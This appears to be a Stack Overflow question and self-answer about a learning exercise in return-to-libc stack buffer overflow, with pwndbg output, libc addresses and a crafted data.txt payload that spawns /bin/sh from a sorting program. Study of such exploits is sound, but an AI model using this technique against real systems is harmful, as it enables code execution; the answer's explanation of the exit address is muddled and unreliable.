-2

I am learning Stack Buffer overflow in Return-to-libc.

The code reads addresses from a file(as char array) and saves it in a

uint32_t array[5]

and tries to open a shell of "/bin/sh" over the existing one.

I have two issues, I use GDB's PWNDBG in Kali linux:

  1. When I am causing the overflow using characters like 'A' in sets of 4 bytes (as uint32-t is 4 bytes), it reaches till the address of "/bin/sh", even shows it and then gives seg. fault.(Can share the pwndbg output screen)
  2. When I use integers (for 4 bytes each) to cause overflow, it starts the shell and then gives

ERROR: Could not find ELF base!

The complete error is:

    Starting program: /some address/ data.txt
.txt file contains:
1
2
3
4
5
f7f00123
2
f7e00124
1
f2e00100

Sorted list in ascending order:
1
1
2
2
3
4
5
f2e00100
f7e00124
f7f00123
[Attaching after process 11528 vfork to child process 11529]
[New inferior 2 (process 11529)]
[Detaching vfork parent process 11528 after child exec]
[Inferior 1 (process 11528) detached]
process 11529 is executing new program: /usr/bin/dash
ERROR: Could not find ELF base!
[Inferior 2 (process 11529) exited normally]

Since I am identifying the file reading and storing as vulnerable process for overflowing, I believe sorted data has no consequence.

My addresses are as follows:

f7f00123-"/bin/sh"
f2e00100- system
f7e00124- exit

Also to check if address is correct

pwndbg> display /s f7f00123
1: x/s 0xf7f00123 0xf7f00123:  "/bin/sh"

Please help me in identifying the issue why its not opening the shell.

KyleMit
  • 30,350
  • 66
  • 462
  • 664
VMi
  • 346
  • 3
  • 16
  • Please can you add the tag `pwndbg` to this question, if this tag already exists? The error message "ERROR: Could not find ELF base!` is `pwndbg` specific. Not a `gdb` error message. In the source from `pwndbg` this is shown when you try to execute a none ELF file. `pwndbg` checks here the beginning (magic) of the file. `pwndbg` want to execute `/usr/bin/dash`, which seems not to be an ELF binary. –  Sep 10 '21 at 04:57
  • I did not get any tag as pwndbg, so did not add. – VMi Sep 10 '21 at 05:07
  • 1
    You can check out: [Teacher request: remove homework questions](https://meta.stackexchange.com/q/270605/209031) for further assistance – KyleMit Feb 04 '22 at 14:25

1 Answers1

-2

Ok, found solution.

The Stack buffer overflow isn't happening above. The exit function wont work as when the data is sorted, it is placed above system So the final data in data.txt will be:

aaaa
bbbb
cccc
dddd
eeee
ffff
ffff
f7f00123
f7e00124
f2e00100
f7f00123

Instead of

address -> 23456789
which corresponds to exit, changed it to

address -> f7f00123
which corresponds to exit

So now after file reading, a shell is spwaned and when typed exit, exits clean.

KyleMit
  • 30,350
  • 66
  • 462
  • 664
VMi
  • 346
  • 3
  • 16